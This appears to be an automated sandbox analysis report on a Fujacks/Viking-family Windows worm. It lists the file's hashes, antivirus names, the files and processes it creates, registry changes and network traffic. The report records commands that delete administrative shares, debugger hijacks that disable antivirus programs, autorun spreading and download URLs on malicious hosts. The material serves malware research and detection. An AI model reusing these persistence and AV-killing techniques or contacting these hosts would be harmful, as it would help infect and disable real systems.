Analysis Date: 2014-01-29 19:04:37
MD5: 99bf68181499ae728e6c836ecb02dd84
SHA1: 687dfa8d7d79f5df5963f6ebc9aea055b020e598

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (empty section; these are the MD5/SHA1 of zero-length data, not sample-specific indicators)
Section: UPX1 md5: 474055486b8ce85dec1852c5f17a26a8 sha1: ba9dd84a05b49d97a5ed34ac02571c9280946952 size: 69632
Section: .rsrc md5: 91751504ebde2d0d0950c8a39795ea41 sha1: 3165bc0d551205f2c79e5aab922eba2984aff55e size: 6144
Section: .Program md5: f8912b7ddef251874546a2db0df108bf sha1: d31d0b7626c7b251c1881ded55c1ac6b2ce71868 size: 1792
Timestamp: 1992-06-19 22:22:17 (matches the fixed placeholder value written by Borland/Delphi linkers, so it probably does not indicate the real build date)
Packer: CDS SS 1.0 beta1 -> CyberDoom
PEhash: b283454e674941accf9925498e1651409de4b7f8
AV (mcafee): W32/Fujacks.aw
AV (clamav): Trojan.Killav-108
AV (avira): TR/Crypt.ULPM.Gen
AV (avg): Win32/Ngvck.AO
AV (msse): Virus:Win32/Viking.JB

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\system32\drivers\suchost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\59$$.bat
Creates File: c:\qw.sys
Creates File: ZLHIS+.exe.exe
Creates Process: C:\WINDOWS\system32\drivers\suchost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\59$$.bat

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del61$$.bat

Process
↳ cmd.exe /c net share C$ /del /y

Creates Process: net share C$ /del /y

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Process: net share admin$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\59$$.bat

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat

Process
↳ cmd.exe /c net share E$ /del /y

Creates Process: net share E$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Winsock DNS: www.daohang08.com

Process
↳ C:\WINDOWS\system32\drivers\suchost.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_CLASSES_ROOT\HTTP\shell\open\command\ ➝
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun ➝
128
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer ➝
C:\WINDOWS\system32\drivers\suchost.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe\Debugger ➝
ntsd -d\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\myUPdatetxt.txt
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del61$$.bat
Creates File: \Device\LanmanRedirector\192.168.1.1\IPC$
Creates File: \\192.168.1.1\shared\Cool_GameSetup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Help\ENU\Desktop_.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\Desktop_.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\52$$.Ico
Creates File: C:\autorun.inf
Creates File: C:\autorun.inf
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates File: C:\Program Files\Adobe\Desktop_.ini
Creates File: C:\Program Files\Desktop_.ini
Creates File: C:\temp\run\Desktop_.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Desktop_.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\Desktop_.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Help\Desktop_.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\86$$.Ico
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: c:\qw.sys
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Desktop_.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Esl\Desktop_.ini
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\Desktop_.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\temp\Desktop_.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\72$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Desktop_.ini
Creates File: C:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\temp\logs\Desktop_.ini
Creates File: UNC\192.168.1.1\PIPE\srvsvc
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\86$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\72$$.Ico
Deletes File: c:\qw.sys
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\52$$.Ico
Creates Process: cmd.exe /c net share C$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del61$$.bat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n
Creates Process: cmd.exe /c net share E$ /del /y
Creates Process: cmd.exe /c net share admin$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Service: RESSDT - c:\qw.sys
Winsock URL: <html>\\n <head>\\n <title>404 Not Found</title>\\n </head>\\n <body>\\n <h1>Not Found</h1>\\n <p>Your browser sent a request that this server could not understand.</p>\\n <p>No such file or directory.</p>\\n <hr />\\n <address>Microsoft-IIS/7.0</address>\\n </body>\\n</html>\\n
Winsock URL: http://www.xlsf013.cn/down.txt
Winsock URL: http://www.9z9t.com/down1.txt

Process
↳ net share C$ /del /y

Creates Process: net1 share C$ /del /y

Process
↳ net share admin$ /del /y

Creates Process: net1 share admin$ /del /y

Process
↳ net share E$ /del /y

Creates Process: net1 share E$ /del /y

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates Process

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 856

Process
↳ Pid 1024

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1860

Process
↳ Pid 1128

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n

Process
↳ net1 share C$ /del /y

Creates File: PIPE\srvsvc

Process
↳ net1 share admin$ /del /y

Creates File: PIPE\srvsvc

Process
↳ net1 share E$ /del /y

Creates File: PIPE\srvsvc

Network Details:

DNS: 9z9t.com
Type: A
184.168.221.77
DNS: 22283.bodis.com
Type: A
199.59.243.107
DNS: 22283.bodis.com
Type: A
199.59.243.108
DNS: 22283.bodis.com
Type: A
199.59.243.109
DNS: 22283.bodis.com
Type: A
199.59.243.106
DNS: 22283.bodis.com
Type: A
199.59.243.105
DNS: www.9z9t.com
Type: A
DNS: www.xlsf013.cn
Type: A
DNS: 1.1.1.10.in-addr.arpa
Type: PTR
DNS: www.daohang08.com
Type: A
HTTP GET: http://www.9z9t.com/down1.txt
User-Agent: ErrCode
HTTP GET: http://www.daohang08.com/2.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.77:80
Flows TCP: 192.168.1.1:1045 ➝ 199.59.243.107:80

Raw Pcap
0x00000000 (00000)   47455420 2f646f77 6e312e74 78742048   GET /down1.txt H
0x00000010 (00016)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000020 (00032)   656e743a 20457272 436f6465 0d0a486f   ent: ErrCode..Ho
0x00000030 (00048)   73743a20 7777772e 397a3974 2e636f6d   st: www.9z9t.com
0x00000040 (00064)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000050 (00080)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f322e68 746d2048 5454502f   GET /2.htm HTTP/
0x00000010 (00016)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000020 (00032)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000030 (00048)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x00000040 (00064)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000050 (00080)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20777777 2e64616f   )..Host: www.dao
0x000000c0 (00192)   68616e67 30382e63 6f6d0d0a 436f6e6e   hang08.com..Conn
0x000000d0 (00208)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000e0 (00224)   76650d0a 0d0a703e 596f7572 2062726f   ve....p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings

DVCLAL
MAINICON
PACKAGEINFO
/Var
}&^~")
0bVQbO
<0[ee2-x'(
.<0Oqw
0@P\hM
0r=<9w9i
 0@TdL
0v).w v
%0&$;.XJ4UF5;30,
*0yk`p$
1 Cly/
#1@%ddR
	)1Lfe
1V;S1V
2:7%|&
2B)13&73.
=2BohW
#(2dk>
$2#G:0YF1QJ2T
2gZi~v
@2N|kr`462(gi.;-
2tpl	 2
}2U`o7Y
30{'v @
32Snapsh
3'+}3%
3kavsvc
3,Kj3#{
{3sd3w
3) VQ^
>+$42	)/
~!43Tc
4\dlt|
4E(pDe$H
4M,4<DLT4M
4M(<\j
/[*4[N
\4T2\(W
\$4VS}V
4YW[SO
5)+3))3)*5)
(56)(>))=))=))7))8)%9'$
56Sgolf
!5gmQ}
_)5O*zK'jK'kK&hI1zU
5QT=C>*
5wKK)(_;
6$6*60666<6B6H6
6bBZ$|
^6e>ku
" 6!P5
&{7)%?!
 =72l\^
7.,KI)K
7NY8iPt
/7sInverflow
851968
_8h6e_
8h6eAQ
8h6e>f:y6e9
8HXhxM
 8~&%K=
8K;'#n
8^(uag
8"," x -
>8|ziq[inm!
>9#3I8
\9`<j]
9(\J5K:/K
9*m<.mhQ
="~a?|
A{Advyi
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
advapi32
advapi32.dll
aHh|g%
aKTUaW
_allmul
API-Log v1.2 by M.o.D. [F2F]
aSyb!k
^.A.T1
AutoRu
AxXtOV
?b^\'`
B((	)&
	#B0y;
[&&b'4c+3S
> Bad	=cB
~bAj;_
bckp- f0
,behigj`1>
BIG5KGREEK
BI:H@ ?
BitBlt
bJTUSSbpS
BlnSelect
BMW!!ZLHIS+.exe.exe
BNH]D&C
bO&qKHqLDiI?
'B'P '
bPIXV5B,
BtnF*C
bUSMOI
Bvcedc
>c0X6";
CallNextHookEx
C*CDocum
cCg'`(
.%CC.NF5XL5Q
cCsEi}/!Mml
CCSM;+GBmm
CCurrenc
Cd(x(r
chsiaAqu
|ci600
_CIatan
c);IceSw
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
clBlack
CloseHandle
 /c M.)
cMcshield.exe
cnq/ii
CoInitialize
comctl32.dll
Cool Debugger for Win32
<Copy*o{3
|	,<Cp
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
CreateFileA
CreateToolh
CreateToolhelp32Snapshot
c/-Rf;0 
c:\r}.t
C_ "RV L7ES
	cUSnc
C:\WINDOWS\system32\MSCOMCTL.oca
C~.;Y{C
'D&4f84FH,
)D)"9DrX)
`.data
DDbisbu417suf~
DDDDDDDDDDDDDD@
DDDDDDDDDDOD@
DDDOD@
D%.*dT}i
~Debugl
+Defaul
DEFAULTe
DHB\HB
DHFFFFLPTXFFFF\`dhFFFFlptx
dh{*s#yY
,}DIB"s
DiskFreeSp
dJ44KF
DllFunctionCall
DlRAMo	-
dProcessMe
DqUs)M
DsJjTsu
_DV4P^D
#e%7[J)TO
.E7MI>
E<BpMY
ECWGTN24*CMJQ
edImage
EDivByZ
// EE5
e>f:y!j
e>f:y{v
e>f:y'Y
EIn]Err[
eJ0sL3
/ej(eisi/r|s' 
EM3_.5f,4^
EnumWindows
EOutOf
eptionp[gp
_E]Q7RlTmxYw
eQ(u7b
- ERROR! -
eUSnc{|
eUSnc/f&TSbpS
eUSncSbpS<h
E)|V6F?
EVENT_SINK_AddRef
EVENT_SINK_QueryInterface
EVENT_SINK_Release
ExitProcess
ExtractIconA
e>YqmkbkruX`~t
f0P	DP
F;3vQQ
F4|8'c
F8Phdo@
f9w4u/
FcmP&M
F_d3moo
Fdd;u&
FindWindowA
(FiwuC@Yz0
)(fMoM
foB.{	+4
FPUMaskValue
Frame1
fRcQ7Y]<jsT
|FreBoth@m
FrmAccoutChoose
FrmChangePass
FrmMainObj
frmSplash
frmUserLogin
/f&T	c
/f&T>f:y
/f&T>f:y\P(uo
FTJIS_
>f:y6e9
>f:yaSGr
>f:y@b	g
>f:y@b	g1Y
>f:y@b	g6e>kXT
>f:yeQOO
>f:y"k
>f:y\P(u
>f:y\P(uUSMO
>f:y\P(uy
>f:ySO
>f:yUSnc
>f:yUSnc4Y
>f:y(Wb
>f:y'Y
G@49@.;U0ID7'K
[G.a<',,%
GANSI_
GBIOS1
GCpsBz
gdi32.dll
GetComputerNameA
GetCurrentProcessId
GetLongPathNameA
GetParent
GetProcAddress
GetWindow
GetWindowLongA
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
gGkup{
gG 	=`T|m
GIF89aT
$g!/L$
[Gl;`>f:yGl;`
`gms,f
GMulDivId
GN\_IZMTEakzg{gn|T_aflg
gQ9gP7bU>lL
 Grr|xxr
gT;~~d
g'Y{vU_pe)
H@2HS7RR7HR8JR;SU?
H4op!T
%H"4Z90P@/XF3WI3WG3XI4GE'L
h5)u~p
Hacked Spy
	H!'c\
hCR:,U
hDxXxM
HE	Hd(N8(
H+&GO0~O3
hHr,g,
homt8/
[,?HotL
H;= pY
hUSnc{|
^hync{|
^hyncyb!k
hyncyb!k
*I0;pN
I1t9+h0
I4sAdap8b
"I75B	 O8(@9(<4
i)"dcK_QGZ%
if exvo
I&(<Hy
iI%oJ(m
IKK8TT6JJ5KK
Image1
ImageList
imgFlag
ImgIndicate
imgPic
INFNANDm7
InitCommonControls
InternetOpenA
IO6P^2
iOi_?CG
i%!qmc
IsDebuggerPresent
IsWindowVisible
(/itD$
	IU0M]
|I'VS'E
iw{rns
	I $y0
}#j4h4e@
J>8RHVDq
jbugtn
%JD0*0$
}#jDh4e@
}#jDhtn@
jd&wub;&
}#j<h@b@
}#j@h@b@
j@h@b@
}#jHh4e@
jHh4e@
}#j<htn@
}#j|htn@
}#jLh4e@
jl[noba
JO8|"G
}#jPh@b@
}#jPhTa@
jPhTa@
jU'm''s
}&jXhTa@
}#jXhTa@
jXhTa@
JXv>Full=
K0jO2o
]:kb;{
kernel32
kernel32.dll
KERNEL32.DLL
Ke#!UM
kgzjo"%
k/P7l?p
KSky^;
kTs^bRs
K	U/G)
*.*KWINDG
~KxI[)
K.yL,TK.
K}zzmf|^mz{agfTAe
],L7|;\
Label1
Label2
Label3
+lB)jP'`M'2 $
lblGrant
LblNote
LblProductName
lblWarning
lh32 GhLd#9
LimegYellowG
ListFir
ListView
L`_[|}j
ljPg`M`?M`@
L`LHgd@
*lM@p>=gD>gD<`5,
LoadLibraryA
lO/"f}
lO&lbh
 LQ~NW
lQqQhQ@\
lQqQ!jWW\
lstrcmpA
lsuv>(.qsp/?~>u()`hv
LTeS.TO)SUPb5H 'L
l@thTm
lusteWl
LvwSelect
^$L#?w
l^XU[c
[lybd_e
ly]i3;
MBia Play>
mblnChangePass
m||ddzl
mdlMain
mdlParameter
\&m\*DWJ
MeO^$4s
MessageBoxA
mgx<H 
_M#m($p
Module
#mP(mK'
(Mpmk}|
mpr.dll
MSComctlLib
MSComctlLib.ImageList
MSComctlLib.ListView
MSCOMCTL.OCX
MSVBVM60.DLL
.m-\t!
`mT4k[,q]<nO:W
MteH_&{
mW9iU9hT<s@<3S0
mY'i	%z
negFZm
NETAPI32.DLL
NetRemoteTOD
nfnp:188(h`vflc:S
N/f&Tck8^
-N/f&TX[(W
N>f:y 
N>f:yD
NGEUH-
;N:gW[&{2N	
NhVpenc
Nhyncyb!k
	N!k{vU_1Y%
N=#LN;LT:F
N[[[[[N
NN<NNNN
NNN[NNN
NN<NNNNNNNNNNNN
NNNNNNNNNNNNNNNNN
not beT@
@Np*|*(
NSbpS	
NTDETECT.COM5
\\.\NTICE
nvO`]\NV
O44#72
OB=	hQ
od/nOr
O/f&T/T
oftware
]OJNSMa)E4KF8)B2
*oK(H;
[O<KN<
ole32.dll
oleaut
oleaut32.dll
OLLYDBG
.om,	;
omnView
{oNbarp
OpenProcess
OPEWOEM.
o_RUST
$oS(fI'nL'}R)
otAddSubw
@	otjlCk@x
]\OUSMO
_Outloor&kO
OXTaSyb!k
Pb7eN5BI:
~pb/"=B
\PbkMO
pencMO
?pEYXI=
pg1tiM]
pKh#h+
 plu]JU|
PL?Y~7
prjMain
Process32First
Process32Next
.Program
PsD~Ss
?Purple#TenO
PX<]C0_
Q	akm;
Qcales
qcvKDesktop_.iniY
qQ(u1\
qQ(u6e9
)qr/G3
Qs|5DsO
Qs6nTs
QsD;Ts
Qs{eRs
Qs.kTsL
Qso_Rs
QsrkSs+lSs
QsSuTsQhRsV
| q#v{
$Q/yy?
Range@V /
RegCloseKey
RegCreateKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
Relogin
Repa8 E
rfacep
R/f&T/T
RichSM
R"iZ1q
rland\Delphi\RTL
RLzTmp!<
RsA^Rs
RSbpS3u
Rsb>Rs
RsC`Ts
rsdMsB
Rs__Rs
<Rs[rSs=
"RTL+C
RXDk|g
r^yC/IH0KF,BB.GE(F
ryL]fC
R+,zKM
+!``[s
'}%`;S1V
;S1VP[
s9QX@Q
Safecal
SbpS:g
SbpShTpe
s)ciLs j
sC$kK'jJ'jJ'iK#o8?
SearchX
SetActiveWindow
SetROP2
SetWindowLongA
SetWindowPos
SF2PC1ID2VC2:=0
S>f:y	gpenc
shell32.dll
SHOHLL6
Show_me
ShowWindow
Sh.P>S
Shyncyb!k
\\.\SICE
sIiU_]
\\.\SIWVID
S_MR6e9
	SOFTWARE\Bo
SO)nUS
SO)nUSSbpS	
SO)nUSSbpS:g
SQf3Pd
SqQ(u6e9
S+T\P(u
S+T\P(uirD
String
StrInputPass
 SU<HtH
S(W8h6e{v
S_)YeQb
SYMBOL1
System
t2 Grpp
t3Peep
T	.47*
tagEXCEPqO
tc`Mc]jXf
TColor
{T'ct#
TerminateProcess
te;S1V
tgdqmsS^
The Customiser
The Customiser Configuration Screen
!This program cannot be run in DOS mode.
This program must be run under Win32
{TI^X&m
t/[koo
t=KV(g)3
TLT9 GrPP
>$TMul
TObjectt3
toskrnl
tpeW[~{
(Tps z
TrainerSpy XP + NT / 2000 / XP + Coded By BofeN
\\.\TRASPY.VXD
	T*Rec
Trtrtw
TRW2000 for Windows 9x
TsjWSshrRs
?t=.)spv(=}8r*dnk+
TsqbRs@
TsreSftl
Ts:_Rs
/T(u	N
TURKISH{
+t_$xtZXt
=%|=.u
u#	Fue
uHlg``Uu
uH&sD$rD#yB$|]K
Ujdqi@
uKJlZ<
U,|llI!{
u!%mCto
UnknowDeci
uP1Kill_Uni
up\G9a
uQ*kJ'kJ'iJ%qQ8
URLDownloadToFileA
URLMON.DLL
user32
user32.dll
u:S>f:y
US!k>f:y
USMO5u
USnc{|
USnc<h
UYs,!sCE
)V@2U<1U?0TC2T:2VE3R
vap!Xw	
VariantCopy
VB5!6&vb6chs.dll
VBA6.DLL
__vbaAryDestruct
__vbaAryUnlock
VBaA{Y
__vbaBoolVarNull
__vbaCastObj
__vbaCastObjVar
__vbaChkstk
__vbaDateStr
__vbaDateVar
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaExitProc
__vbaFileOpen
__vbaForEachCollObj
__vbaForEachCollVar
__vbaFpCy
__vbaFPException
__vbaFpI4
__vbaFpR8
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarg
__vbaFreeVarList
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Var
__vbaInputFile
__vbaInStr
__vbaInStrVar
__vbaLateIdCall
__vbaLateIdCallLd
__vbaLateIdSt
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLenBstr
__vbaLenVar
__vbaLenVarB
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaNextEachCollObj
__vbaNextEachCollVar
__vbaObjIs
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaR4Var
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaRefVarAry
__vbaResume
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrCy
__vbaStrDate
__vbaStrFixstr
__vbaStrI2
__vbaStrI4
__vbaStrLike
__vbaStrMove
__vbaStrR8
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaVarAdd
__vbaVarAnd
__vbaVarCat
__vbaVarCmpEq
__vbaVarCmpGt
__vbaVarCmpNe
__vbaVarCopy
__vbaVarDup
__vbaVarIndexLoad
__vbaVarIndexLoadRefLock
__vbaVarLateMemCallLd
__vbaVarLikeVar
__vbaVarMove
__vbaVarOr
__vbaVarSub
__vbaVarTstEq
__vbaVarTstNe
__vbaVarZero
VirusScanNOD32
v\~ME/
$Vol& O
VsTskMgrnaPrd
vwxxyy
vwxyzz
VxDMonClass
wa	e;$
w;%D<D
wGB2312
wininet.dll
wN\7OK
WNetAddConnection2A
WriteProcessMemory
-<~WSA
wsock32.dll
Wt4xPmn
w#t?Htb
wUgLXB
W,	W5TR?g.#=
wYuX[o
X2UI5PE4PE4ME>nF<EH<
xaS;Tu
xBrfht"
XDsB>]`
X[>e(WO
 xGra;c
^X[irD
xm`wl_yna
XorCmp4FromSt
X< qN(kJ'iK%p*1
`\XTag
X'Zhk/5;;m
!'y)05
Ya5yhNtpNshQub@~[C
y	ghQ@\\
y	g!jWW\
YHr,g>
YHr,g 
YHr,g,
~y~>LD
ympmpk
Y{vU_(
yX`?iE
~~~}}}{{{yyywwwuuurrrqqqooollljjjhhhgggdddbbb___]]][[[YYYVVVUUUSSSPPPOOOLLLKKKHHHFFFDDDBBB@@@<<<:::888///---+++)))%%%!!!
')Z>2RF1SE1UJ2L	(J
)Z8.`^
Z}*"+8A
z[D3.$
 Z.eO\d
)zineQmsctls_
ZLHIS+
ZTUWVSA
<zwpo}
`ZzpM(
zz}vb_